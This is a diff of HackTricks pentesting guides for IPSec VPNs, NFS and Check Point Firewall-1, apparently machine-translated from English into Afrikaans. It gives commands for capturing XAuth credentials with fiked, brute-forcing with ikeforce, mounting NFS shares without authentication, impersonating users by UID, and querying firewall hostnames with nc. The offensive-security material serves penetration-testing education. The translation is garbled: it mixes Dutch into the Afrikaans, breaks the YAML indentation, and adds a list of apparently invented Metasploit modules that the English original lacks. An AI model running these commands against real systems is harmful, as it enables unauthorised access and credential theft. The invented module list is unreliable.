omskakel vir snuffelwerk, wat gedoen kan word met behulp van ARP-spoofing, [meer inligting](https://opensourceforu.com/2012/01/ipsec-vpn-penetration-testing-backtrack-tools/)). Fiked sal optree as 'n VPN-eindpunt en sal die XAuth-geloofsbriewe vasvang: ```bash fiked -g -k testgroup:secretkey -l output.txt -d ``` +Verder, probeer om met behulp van IPSec een MitM-aanval uit te voeren en alle verkeer naar poort 500 te blokkeer. Als de IPSec-tunnel niet kan worden opgezet, wordt het verkeer mogelijk in heldere tekst verzonden. -Also, using IPSec try to make a MitM attack and block all traffic to port 500, if the IPSec tunnel cannot be established maybe the traffic will be sent in clear. - -### Brute-forcing XAUTH username ad password with ikeforce - -To brute force the **XAUTH** (when you know a valid group name **id** and the **psk**) you can use a username or list of usernames and a list o passwords: +### Brute-forcing XAUTH-gebruikersnaam en wachtwoord met ikeforce +Om de **XAUTH** (wanneer je een geldige groepsnaam **id** en de **psk** weet) te brute forcen, kun je een gebruikersnaam of lijst van gebruikersnamen en een lijst met wachtwoorden gebruiken: ```bash ./ikeforce.py -b -i -u -k -w [-s 1] ``` +Op hierdie manier sal ikeforce probeer om te verbind deur elke kombinasie van gebruikersnaam:wagwoord te gebruik. -This way, ikeforce will try to connect using each combination of username:password. +As jy een of verskeie geldige transformasies gevind het, gebruik hulle dan soos in die vorige stappe. -If you found one or several valid transforms just use them like in the previous steps. +## Verifikasie met 'n IPSEC VPN -## Authentication with an IPSEC VPN - -In Kali, **VPNC** is utilized to establish IPsec tunnels. The **profiles** must be located in the directory `/etc/vpnc/`. You can initiate these profiles using the command _**vpnc**_. - -The following commands and configurations illustrate the process of setting up a VPN connection with VPNC: +In Kali word **VPNC** gebruik om IPsec-tunnels te vestig. Die **profiele** moet in die gids `/etc/vpnc/` geleë wees. Jy kan hierdie profiele inisieer deur die opdrag _**vpnc**_ te gebruik. +Die volgende opdragte en konfigurasies illustreer die proses om 'n VPN-verbinding met VPNC op te stel: ```bash root@system:~# cat > /etc/vpnc/samplevpn.conf << STOP IPSec gateway [VPN_GATEWAY_IP] @@ -268,22 +239,21 @@ root@system:~# vpnc samplevpn VPNC started in background (pid: [PID])... root@system:~# ifconfig tun0 ``` +In hierdie opstelling: -In this setup: +- Vervang `[VPN_GATEWAY_IP]` met die werklike IP-adres van die VPN-poort. +- Vervang `[VPN_CONNECTION_ID]` met die identifiseerder vir die VPN-verbinding. +- Vervang `[VPN_GROUP_SECRET]` met die VPN se groepgeheim. +- Vervang `[VPN_USERNAME]` en `[VPN_PASSWORD]` met die VPN-verifikasie-inligting. +- `[PID]` simboliseer die proses-ID wat toegewys sal word wanneer `vpnc` geïnisieer word. -- Replace `[VPN_GATEWAY_IP]` with the actual IP address of the VPN gateway. -- Replace `[VPN_CONNECTION_ID]` with the identifier for the VPN connection. -- Replace `[VPN_GROUP_SECRET]` with the VPN's group secret. -- Replace `[VPN_USERNAME]` and `[VPN_PASSWORD]` with the VPN authentication credentials. -- `[PID]` symbolizes the process ID that will be assigned when `vpnc` initiates. +Maak seker dat werklike, veilige waardes gebruik word om die plasehouers te vervang wanneer die VPN gekonfigureer word. -Ensure that actual, secure values are used to replace the placeholders when configuring the VPN. +## Verwysingsmateriaal -## Reference Material - -* [PSK cracking paper](http://www.ernw.de/download/pskattack.pdf) +* [PSK-kraakpapier](http://www.ernw.de/download/pskattack.pdf) * [SecurityFocus Infocus](http://www.securityfocus.com/infocus/1821) -* [Scanning a VPN Implementation](http://www.radarhack.com/dir/papers/Scanning\_ike\_with\_ikescan.pdf) +* [Skandering van 'n VPN-implementering](http://www.radarhack.com/dir/papers/Scanning\_ike\_with\_ikescan.pdf) * Network Security Assessment 3rd Edition ## Shodan @@ -292,20 +262,20 @@ Ensure that actual, secure values are used to replace the placeholders when conf
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/network-services-pentesting/nfs-service-pentesting.md b/network-services-pentesting/nfs-service-pentesting.md index 55e06dc3b..9897c8b51 100644 --- a/network-services-pentesting/nfs-service-pentesting.md +++ b/network-services-pentesting/nfs-service-pentesting.md @@ -1,150 +1,144 @@ -# 2049 - Pentesting NFS Service +# 2049 - Pentesting NFS-diens
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## **Basic Information** +## **Basiese Inligting** -**NFS** is a system designed for **client/server** that enables users to seamlessly access files over a network as though these files were located within a local directory. +**NFS** is 'n stelsel wat ontwerp is vir **kliënt/bediener** wat gebruikers in staat stel om naadloos toegang tot lêers oor 'n netwerk te verkry asof hierdie lêers binne 'n plaaslike gids geleë is. -A notable aspect of this protocol is its lack of built-in **authentication** or **authorization mechanisms**. Instead, authorization relies on **file system information**, with the server tasked with accurately translating **client-provided user information** into the file system's required **authorization format**, primarily following **UNIX syntax**. +'n Noemenswaardige aspek van hierdie protokol is die gebrek aan ingeboude **outentiserings-** of **magtigingsmeganismes**. In plaas daarvan steun magtiging op **lêersisteeminligting**, waar die bediener die taak het om **kliëntverskafte gebruikersinligting** akkuraat te vertaal na die lêersisteem se vereiste **magtigingsformaat**, hoofsaaklik volgens **UNIX-sintaksis**. -Authentication commonly relies on **UNIX `UID`/`GID` identifiers and group memberships**. However, a challenge arises due to the potential mismatch in **`UID`/`GID` mappings** between clients and servers, leaving no room for additional verification by the server. Consequently, the protocol is best suited for use within **trusted networks**, given its reliance on this method of authentication. - -**Default port**: 2049/TCP/UDP (except version 4, it just needs TCP or UDP). +Outentisering steun gewoonlik op **UNIX `UID`/`GID`-identifiseerders en groepslidmaatskap**. 'n Uitdaging ontstaan egter as gevolg van die potensiële wanpassing in **`UID`/`GID`-afbeeldings** tussen kliënte en bedieners, wat geen spasie laat vir addisionele verifikasie deur die bediener nie. Gevolglik is die protokol die mees geskik vir gebruik binne **vertroude netwerke**, gegewe sy afhanklikheid van hierdie metode van outentisering. +**Verstekpoort**: 2049/TCP/UDP (behalwe weergawe 4, dit benodig net TCP of UDP). ``` 2049/tcp open nfs 2-3 (RPC #100003 ``` +### Weergawes -### Versions +- **NFSv2**: Hierdie weergawe word erken vir sy breë verenigbaarheid met verskillende stelsels en het sy betekenis gemerk met aanvanklike operasies oor UDP. As die **oudste** in die reeks, het dit die grondslag gelê vir toekomstige ontwikkelings. -- **NFSv2**: This version is recognized for its broad compatibility with various systems, marking its significance with initial operations predominantly over UDP. Being the **oldest** in the series, it laid the groundwork for future developments. +- **NFSv3**: Ingelei met 'n verskeidenheid verbeterings, het NFSv3 uitgebrei op sy voorganger deur ondersteuning te bied vir veranderlike lêergroottes en verbeterde foutverslagdoening. Ten spyte van sy vorderings, het dit beperkings in volledige agterwaartse verenigbaarheid met NFSv2-kliënte ondervind. -- **NFSv3**: Introduced with an array of enhancements, NFSv3 expanded on its predecessor by supporting variable file sizes and offering improved error reporting mechanisms. Despite its advancements, it faced limitations in full backward compatibility with NFSv2 clients. +- **NFSv4**: 'n Baanbrekerweergawe in die NFS-reeks, het NFSv4 'n reeks funksies gebring wat ontwerp is om lêerdeling oor netwerke te moderniseer. Merkwaardige verbeterings sluit in die integrasie van Kerberos vir **hoë sekuriteit**, die vermoë om vuurmuure te deurkruis en oor die internet te werk sonder die nodigheid van poorttoewysers, ondersteuning vir Toegangsbeheerlyste (ACL's) en die bekendstelling van staat-gebaseerde operasies. Sy prestasieverbeterings en die aanvaarding van 'n staatvolle protokol onderskei NFSv4 as 'n deurslaggewende vooruitgang in netwerk-lêerdelingstegnologieë. -- **NFSv4**: A landmark version in the NFS series, NFSv4 brought forth a suite of features designed to modernize file sharing across networks. Notable improvements include the integration of Kerberos for **high security**, the capability to traverse firewalls and operate over the Internet without the need for portmappers, support for Access Control Lists (ACLs), and the introduction of state-based operations. Its performance enhancements and the adoption of a stateful protocol distinguish NFSv4 as a pivotal advancement in network file sharing technologies. +Elke weergawe van NFS is ontwikkel met die doel om die ontwikkelende behoeftes van netwerkomgewings aan te spreek, en om sekuriteit, verenigbaarheid en prestasie geleidelik te verbeter. -Each version of NFS has been developed with the intent to address the evolving needs of network environments, progressively enhancing security, compatibility, and performance. - -## Enumeration - -### Useful nmap scripts +## Opname +### Nuttige nmap-skripte ```bash nfs-ls #List NFS exports and check permissions nfs-showmount #Like showmount -e nfs-statfs #Disk statistics and info from NFS share ``` +### Nuttige metasploit-modules -### Useful metasploit modules +Metasploit is 'n kragtige raamwerk vir penetrasietoetse wat 'n verskeidenheid modules bied om verskillende aanvalstegnieke uit te voer. Hier is 'n paar nuttige metasploit-modules wat jy kan gebruik vir jou penetrasietoetse: +- `exploit/multi/handler`: Hierdie module stel jou in staat om 'n luisterende posisie te skep om inkomende verbindings te hanteer. Dit kan gebruik word om 'n sessie te skep wanneer 'n aanval suksesvol is. +- `exploit/multi/http/nfs_rpcbind_bof`: Hierdie module maak gebruik van 'n buffer-oorloopkwesbaarheid in die NFS RPCBIND-diens om 'n aanval uit te voer. Dit kan gebruik word om 'n afgeleë kode-uitvoering te verkry op 'n kwesbare masjien. +- `auxiliary/scanner/nfs/nfsmount`: Hierdie module skandeer 'n doelwitstelsel om te bepaal of die NFS-diens beskikbaar is en of dit toeganklik is vir monteerbare deelname. Dit kan help om potensiële aanvalsveilighede te identifiseer. +- `post/multi/gather/nfs_enum`: Hierdie module word gebruik om inligting oor die NFS-diens op 'n doelwitstelsel te versamel. Dit kan nuttige inligting soos gedeelde lêers, gebruikers en groepe oplewer. +- `post/multi/manage/nfs_mount`: Hierdie module maak dit moontlik om 'n NFS-gedeelde lêerstelsel op 'n doelwitstelsel te monteer. Dit kan handig wees vir die verkryging van toegang tot lêers en data op die doelwitstelsel. + +Dit is net 'n paar voorbeelde van die vele metasploit-modules wat beskikbaar is. Dit is belangrik om die dokumentasie te raadpleeg en die modules te verken om die beste modules vir jou spesifieke penetrasietoets te vind. ```bash scanner/nfs/nfsmount #Scan NFS mounts and list permissions ``` +### Monteer -### Mounting - -To know **which folder** has the server **available** to mount you an ask it using: - +Om te weet **watter vouer** die bediener **beskikbaar** het om te monteer, kan jy dit vra deur die volgende te gebruik: ```bash showmount -e ``` - -Then mount it using: - +Monteer dit dan met behulp van: ```bash mount -t nfs [-o vers=2] : -o nolock ``` +Jy moet spesifiseer om **weergawe 2 te gebruik** omdat dit **geen** **verifikasie** of **magtiging** het nie. -You should specify to **use version 2** because it doesn't have **any** **authentication** or **authorization**. - -**Example:** - +**Voorbeeld:** ```bash mkdir /mnt/new_back mount -t nfs [-o vers=2] 10.12.0.150:/backup /mnt/new_back -o nolock ``` +## Toestemmings -## Permissions - -If you mount a folder which contains **files or folders only accesible by some user** (by **UID**). You can **create** **locally** a user with that **UID** and using that **user** you will be able to **access** the file/folder. +As jy 'n vouer monteer wat **lêers of vouers bevat wat slegs deur 'n sekere gebruiker toeganklik is** (deur **UID**). Jy kan **plaaslik** 'n gebruiker met daardie **UID** skep en deur daardie **gebruiker** te gebruik, sal jy in staat wees om toegang tot die lêer/vouer te verkry. ## NSFShell -To easily list, mount and change UID and GID to have access to files you can use [nfsshell](https://github.com/NetDirect/nfsshell). +Om maklik 'n lys te maak, te monteer en UID en GID te verander om toegang tot lêers te verkry, kan jy [nfsshell](https://github.com/NetDirect/nfsshell) gebruik. -[Nice NFSShell tutorial.](https://www.pentestpartners.com/security-blog/using-nfsshell-to-compromise-older-environments/) - -## Config files +[Mooi NFSShell-tutoriaal.](https://www.pentestpartners.com/security-blog/using-nfsshell-to-compromise-older-environments/) +## Konfigurasie-lêers ``` /etc/exports /etc/lib/nfs/etab ``` +### Gevaarlike instellings -### Dangerous settings +- **Lees- en Skryfregte (`rw`):** Hierdie instelling maak dit moontlik om vanaf en na die lêersisteem te lees en skryf. Dit is noodsaaklik om die implikasies van so 'n breë toegang te oorweeg. -- **Read and Write Permissions (`rw`):** This setting allows both reading from and writing to the file system. It's essential to consider the implications of granting such broad access. +- **Gebruik van Onveilige Poorte (`insecure`):** Wanneer dit geaktiveer is, maak dit die stelsel moontlik om poorte bo 1024 te gebruik. Die veiligheid van poorte bo hierdie reeks kan minder streng wees, wat die risiko verhoog. -- **Use of Insecure Ports (`insecure`):** When enabled, this allows the system to utilize ports above 1024. The security of ports above this range can be less stringent, increasing risk. +- **Sigbaarheid van Geneste Lêersisteme (`nohide`):** Hierdie konfigurasie maak dit moontlik dat gidslyne sigbaar is selfs as 'n ander lêersisteem onder 'n uitgevoerde gidslyn gemonteer is. Elke gidslyn vereis sy eie uitvoerinskrywing vir behoorlike bestuur. -- **Visibility of Nested File Systems (`nohide`):** This configuration makes directories visible even if another file system is mounted below an exported directory. Each directory requires its own export entry for proper management. +- **Eienaar van Rooi Lêersisteemlêers (`no_root_squash`):** Met hierdie instelling behou lêers wat deur die rooi gebruiker geskep is, hul oorspronklike UID/GID van 0, sonder om die beginsel van minste bevoegdheid in ag te neem en moontlik oormatige regte toe te ken. -- **Root Files Ownership (`no_root_squash`):** With this setting, files created by the root user maintain their original UID/GID of 0, disregarding the principle of least privilege and potentially granting excessive permissions. +- **Geen Beperking van Alle Gebruikers (`no_all_squash`):** Hierdie opsie verseker dat gebruikersidentiteite regoor die stelsel behou word, wat kan lei tot probleme met toestemming en toegangsbeheer as dit nie korrek hanteer word nie. -- **Non-Squashing of All Users (`no_all_squash`):** This option ensures that user identities are preserved across the system, which could lead to permission and access control issues if not correctly handled. +## Bevoorregte Eskalasie deur gebruik te maak van NFS-misconfiguraties -## Privilege Escalation using NFS misconfigurations - -[NFS no\_root\_squash and no\_all\_squash privilege escalation](../linux-hardening/privilege-escalation/nfs-no\_root\_squash-misconfiguration-pe.md) - -## HackTricks Automatic Commands +[NFS no\_root\_squash en no\_all\_squash bevoorregte eskalasie](../linux-hardening/privilege-escalation/nfs-no\_root\_squash-misconfiguration-pe.md) +## HackTricks Outomatiese Opdragte ``` Protocol_Name: NFS #Protocol Abbreviation if there is one. Port_Number: 2049 #Comma separated if there is more than one. Protocol_Description: Network File System #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for NFS - Note: | - NFS is a system designed for client/server that enables users to seamlessly access files over a network as though these files were located within a local directory. +Name: Notes +Description: Notes for NFS +Note: | +NFS is a system designed for client/server that enables users to seamlessly access files over a network as though these files were located within a local directory. - #apt install nfs-common - showmount 10.10.10.180 ~or~showmount -e 10.10.10.180 - should show you available shares (example /home) +#apt install nfs-common +showmount 10.10.10.180 ~or~showmount -e 10.10.10.180 +should show you available shares (example /home) - mount -t nfs -o ver=2 10.10.10.180:/home /mnt/ - cd /mnt - nano into /etc/passwd and change the uid (probably 1000 or 1001) to match the owner of the files if you are not able to get in +mount -t nfs -o ver=2 10.10.10.180:/home /mnt/ +cd /mnt +nano into /etc/passwd and change the uid (probably 1000 or 1001) to match the owner of the files if you are not able to get in - https://book.hacktricks.xyz/pentesting/nfs-service-pentesting +https://book.hacktricks.xyz/pentesting/nfs-service-pentesting Entry_2: - Name: Nmap - Description: Nmap with NFS Scripts - Command: nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 {IP} +Name: Nmap +Description: Nmap with NFS Scripts +Command: nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 {IP} ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/network-services-pentesting/pentesting-264-check-point-firewall-1.md b/network-services-pentesting/pentesting-264-check-point-firewall-1.md index de54a7ceb..afcc70df6 100644 --- a/network-services-pentesting/pentesting-264-check-point-firewall-1.md +++ b/network-services-pentesting/pentesting-264-check-point-firewall-1.md @@ -1,33 +1,28 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-It's possible to interact with **CheckPoint** **Firewall-1** firewalls to discover valuable information such as the firewall's name and the management station's name. This can be done by sending a query to the port **264/TCP**. +Dit is moontlik om met **CheckPoint** **Firewall-1**-brandmuure te kommunikeer om waardevolle inligting soos die naam van die brandmuur en die naam van die bestuursstasie te ontdek. Dit kan gedoen word deur 'n navraag na poort **264/TCP** te stuur. -### Obtaining Firewall and Management Station Names - -Using a pre-authentication request, you can execute a module that targets the **CheckPoint Firewall-1**. The necessary commands for this operation are outlined below: +### Verkryging van Brandmuur- en Bestuursstasienames +Met 'n voorverifikasieversoek kan jy 'n module uitvoer wat die **CheckPoint Firewall-1** teiken. Die nodige opdragte vir hierdie operasie word hieronder uiteengesit: ```bash use auxiliary/gather/checkpoint_hostname set RHOST 10.10.10.10 ``` - -Upon execution, the module attempts to contact the firewall's SecuRemote Topology service. If successful, it confirms the presence of a CheckPoint Firewall and retrieves the names of both the firewall and the SmartCenter management host. Here's an example of what the output might look like: - +By uitvoering probeer die module om kontak te maak met die firewall se SecuRemote Topology-diens. As dit suksesvol is, bevestig dit die teenwoordigheid van 'n CheckPoint Firewall en haal die name van beide die firewall en die SmartCenter-bestuursgasheer op. Hier is 'n voorbeeld van hoe die uitset kan lyk: ```text [*] Attempting to contact Checkpoint FW1 SecuRemote Topology service... [+] Appears to be a CheckPoint Firewall... @@ -35,22 +30,17 @@ Upon execution, the module attempts to contact the firewall's SecuRemote Topolog [+] SmartCenter Host: FIREFIGHTER-MGMT.example.com [*] Auxiliary module execution completed ``` +### Alternatiewe Metode vir Hostnaam en ICA Naam Ontdekking -### Alternative Method for Hostname and ICA Name Discovery - -Another technique involves a direct command that sends a specific query to the firewall and parses the response to extract the firewall's hostname and ICA name. The command and its structure are as follows: - +'n Ander tegniek behels 'n direkte bevel wat 'n spesifieke navraag na die firewall stuur en die respons ontleed om die firewall se hostnaam en ICA-naam te onttrek. Die bevel en sy struktuur is as volg: ```bash printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 10.10.10.10 264 | grep -a CN | cut -c 2- ``` - -The output from this command provides detailed information regarding the firewall's certificate name (CN) and organization (O), as demonstrated below: - +Die uitset van hierdie bevel verskaf gedetailleerde inligting oor die sertifikaatnaam (CN) en organisasie (O) van die firewall, soos hieronder gedemonstreer: ```text CN=Panama,O=MGMTT.srv.rxfrmi ``` - -## References +## Verwysings * [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit\_doGoviewsolutiondetails=&solutionid=sk69360](https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360) * [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html\#check-point-firewall-1-topology-port-264](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html#check-point-firewall-1-topology-port-264) @@ -59,16 +49,14 @@ CN=Panama,O=MGMTT.srv.rxfrmi
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md b/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md index b097a1d15..bdeaa6c97 100644 --- a/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md +++ b/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md @@ -1,28 +1,25 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* 